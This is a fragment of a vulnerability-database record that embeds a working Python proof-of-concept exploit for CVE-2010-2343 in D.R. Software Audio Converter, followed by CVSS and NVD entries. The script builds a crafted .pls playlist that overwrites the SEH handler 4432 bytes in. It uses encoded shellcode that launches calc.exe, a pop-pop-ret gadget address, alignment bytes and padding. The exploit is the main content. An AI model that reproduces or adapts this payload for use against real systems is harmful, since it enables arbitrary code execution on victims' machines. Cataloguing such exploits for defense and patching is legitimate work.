\r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#***********************************************************************************\r\n#code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for .... \\n\";\r\n\r\nimport socket\r\n#shellcode running calc.exe alpha2 encoded basereg edx\r\nshell=\"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA\" \r\njunk=\"B\" * (4432 - len(shell)) #seh overwritten after 4432 bytes\r\nnseh= \"\\xEB\\x06\\xEB\\x06\" # jmp forward \r\nseh= \"\\xF1\\x8E\\x03\\x10\" # nice ppr from audioconv\r\nalign=\"\\x61\\x61\\x61\\xff\\xE2\" # popad / popad / popad / jmp edx\r\nbuffer= shell + junk + nseh + seh + \"\\x90\" * 20 + align + \"A\"* 10000# added some nops after seh\r\n \r\nmefile = open('poc.pls','w');\r\nmefile.write(buffer);\r\nmefile.close()\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13760/"}], "cve": [{"lastseen": "2019-05-29T18:10:28", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in D.R. 
Software Audio Converter 8.1, 2007, and 8.05 allows remote attackers to execute arbitrary code via a crafted pls playlist file.", "modified": "2017-08-17T01:32:00", "id": "CVE-2010-2343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2343", "published": "2010-06-21T15:30:00", "title": "CVE-2010-2343", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}